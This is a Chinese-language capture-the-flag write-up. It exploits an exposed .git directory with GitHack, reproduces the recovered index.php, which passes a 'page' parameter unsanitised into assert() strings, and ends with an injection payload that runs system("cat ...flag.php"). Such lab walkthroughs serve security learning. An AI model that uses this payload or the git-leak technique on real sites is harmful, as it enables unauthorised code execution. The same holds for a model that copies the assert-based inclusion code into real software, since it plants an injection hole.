进入靶场
看到git想到git泄漏 ,试试
.git
能访问到,确实存在,需要使用工具了
有两个
githack和githacker
githack 指的是一款用于利用 Git 仓库泄露漏洞来恢复完整源代码的工具
使用下面这两个命令在Kali安装
git clone https://github.com/lijiejie/GitHack.git
cd GitHack pip install -r requirements.txt
可以查看到flag.php index.php
发现flag.php是空的,index.php是关键
php
<?php
// 检查是否通过 GET 请求传递了名为 'page' 的参数
if (isset($_GET['page'])) {
// 如果存在 'page' 参数,将其值赋给变量 $page
$page = $_GET['page'];
} else {
// 若未传递 'page' 参数,将 $page 设置为默认值 'home'
$page = "home";
}
// 构建要包含的 PHP 文件的完整路径
// 把 'templates/' 目录和用户传入的 $page 值以及 '.php' 扩展名拼接起来
$file = "templates/" . $page . ".php";
// 注释提示 '..' 是危险的,因为 '..' 常用于目录遍历攻击
// 使用 assert 函数检查拼接后的文件路径中是否包含 '..'
// strpos 函数用于查找 '..' 在 $file 中首次出现的位置
// 如果包含 '..',则认为是黑客尝试进行目录遍历攻击,终止脚本并输出错误信息
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// 注释提示后续要优化这部分代码的显示效果
// 使用 assert 函数检查拼接后的文件路径对应的文件是否存在
// 如果文件不存在,终止脚本并输出相应的错误信息
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
<!DOCTYPE html>
<html>
<head>
<!-- 设置页面的字符编码为 UTF-8,确保能正确显示各种字符 -->
<meta charset="utf-8">
<!-- 告知 Internet Explorer 使用最新的渲染引擎 -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<!-- 设置页面的视口,使页面在不同设备上能正确缩放显示 -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- 设置网页的标题 -->
<title>My PHP Website</title>
<!-- 引入 Twitter Bootstrap 框架的 CSS 文件,用于美化页面样式 -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
</head>
<body>
<!-- 创建一个固定在页面顶部的导航栏,采用反色样式 -->
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<!-- 导航栏头部部分 -->
<div class="navbar-header">
<!-- 创建一个用于在小屏幕设备上展开/收起导航菜单的按钮 -->
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<!-- 为屏幕阅读器提供描述信息 -->
<span class="sr-only">Toggle navigation</span>
<!-- 显示三条横线图标,代表导航菜单按钮 -->
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<!-- 导航栏的品牌链接,点击可回到网站首页 -->
<a class="navbar-brand" href="#">Project name</a>
</div>
<!-- 导航栏菜单部分,默认处于收起状态 -->
<div id="navbar" class="collapse navbar-collapse">
<!-- 创建一个无序列表作为导航栏的菜单项 -->
<ul class="nav navbar-nav">
<!-- 如果当前显示的页面是 'home',为该菜单项添加 'active' 类,使其高亮显示 -->
<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
<!-- 如果当前显示的页面是 'about',为该菜单项添加 'active' 类,使其高亮显示 -->
<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
<!-- 如果当前显示的页面是 'contact',为该菜单项添加 'active' 类,使其高亮显示 -->
<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
<!-- 这是一个被注释掉的菜单项,原本可能用于显示包含敏感信息的页面 -->
<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
</ul>
</div>
</div>
</nav>
<!-- 创建一个容器,设置顶部外边距为 50px,用于显示页面内容 -->
<div class="container" style="margin-top: 50px">
<?php
// 引入之前拼接好路径的 PHP 文件,将其内容包含到当前页面中
require_once $file;
?>
</div>
<!-- 引入 jQuery 库,为 Bootstrap 框架的交互效果提供支持 -->
<!-- 注意:这里的 script 标签闭合方式有误,应改为 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
<!-- 引入 Twitter Bootstrap 框架的 JavaScript 文件,实现导航栏等交互效果 -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
</body>主要审上面的php代码
构造payload
//?page=').system("cat ./templates/flag.php");//
